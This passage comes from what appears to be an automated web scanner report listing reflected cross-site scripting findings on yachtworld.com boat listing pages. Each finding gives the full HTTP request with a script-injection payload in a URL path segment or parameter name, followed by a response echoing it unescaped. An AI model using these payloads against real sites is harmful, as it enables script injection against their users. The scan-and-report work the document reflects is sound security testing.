Set-Cookie: VIEWED_BOATS_STORE=2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:40:13 GMT
Set-Cookie: VIEWED_BOATS_STORE=2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 28566

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
follow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2266476&boat_id=2266476&back=/core/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FLc4775"><script>alert(1)</script>35827325622/United-States&boat_id=2266476">
...[SNIP]...

3.136. http://www.yachtworld.com/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2006/32-Regulator-With-Trailer-reduced-2266476/Destin/FL/United-States

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b8e7"><script>alert(1)</script>b92c4a459e7 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States1b8e7"><script>alert(1)</script>b92c4a459e7 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_; s_pers=%20s_nr%3D1296155975932%7C1298747975932%3B%20s_lv%3D1296155975933%7C1390763975933%3B%20s_lv_s%3DFirst%2520Visit%7C1296157775933%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.4.10.1296155952

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:40:30 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Mon, 24 Jan 2011 21:44:50 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:40:30 GMT
Set-Cookie: VIEWED_BOATS_STORE=2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 28582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2266476&boat_id=2266476&back=/core/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States1b8e7"><script>alert(1)</script>b92c4a459e7&boat_id=2266476">
...[SNIP]...

3.137. http://www.yachtworld.com/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2006/32-Regulator-With-Trailer-reduced-2266476/Destin/FL/United-States

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d5fd"><script>alert(1)</script>4ed4980776e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States?5d5fd"><script>alert(1)</script>4ed4980776e=1 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_; s_pers=%20s_nr%3D1296155975932%7C1298747975932%3B%20s_lv%3D1296155975933%7C1390763975933%3B%20s_lv_s%3DFirst%2520Visit%7C1296157775933%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.4.10.1296155952

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:39:30 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Mon, 24 Jan 2011 21:44:50 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:39:30 GMT
Set-Cookie: VIEWED_BOATS_STORE=2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 27776

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?5d5fd"><script>alert(1)</script>4ed4980776e=1&slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2266476&boat_id=2266476&back=/core/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States&boat_id=2266476">
...[SNIP]...

3.138. http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-*low-Hours*-2291213/Norwalk/CT/United-States [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	*/boats/2006/Regulator-32-Forward-Seating-low-Hours-2291213/Norwalk/CT/United-States*

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ece8"><script>alert(1)</script>decc34fa857 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2006/Regulator-32-Forward-Seating-*low-Hours*-2291213/Norwalk5ece8"><script>alert(1)</script>decc34fa857/CT/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:03:48 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Wed, 01 Dec 2010 21:04:09 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2291213%5B%25%5D32%27+Regulator+32+Forward+Seating+*Low+Hours*%5B%25%5DUSD%26nbsp%3B114%2C995%5B%25%5DNorwalk%2C+CT%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F9%2F1%2F2%2F2291213_1_mini.jpg%3F1291236529000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-*Low-Hours*-2291213%2FNorwalk%2FCT%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:03:48 GMT
Set-Cookie: VIEWED_BOATS_STORE=2291213%5B%25%5D32%27+Regulator+32+Forward+Seating+*Low+Hours*%5B%25%5DUSD%26nbsp%3B114%2C995%5B%25%5DNorwalk%2C+CT%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F9%2F1%2F2%2F2291213_1_mini.jpg%3F1291236529000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-*Low-Hours*-2291213%2FNorwalk%2FCT%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
ollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2291213&boat_id=2291213&back=/core/boats/2006/Regulator-32-Forward-Seating-*low-Hours*-2291213/Norwalk5ece8"><script>alert(1)</script>decc34fa857/CT/United-States&boat_id=2291213">
...[SNIP]...

3.139. http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-*low-Hours*-2291213/Norwalk/CT/United-States [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	*/boats/2006/Regulator-32-Forward-Seating-low-Hours-2291213/Norwalk/CT/United-States*

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91247"><script>alert(1)</script>c954ce2776c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2006/Regulator-32-Forward-Seating-*low-Hours*-2291213/Norwalk/CT91247"><script>alert(1)</script>c954ce2776c/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:04:20 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Wed, 01 Dec 2010 21:04:09 GMT
Content-Language: en-US
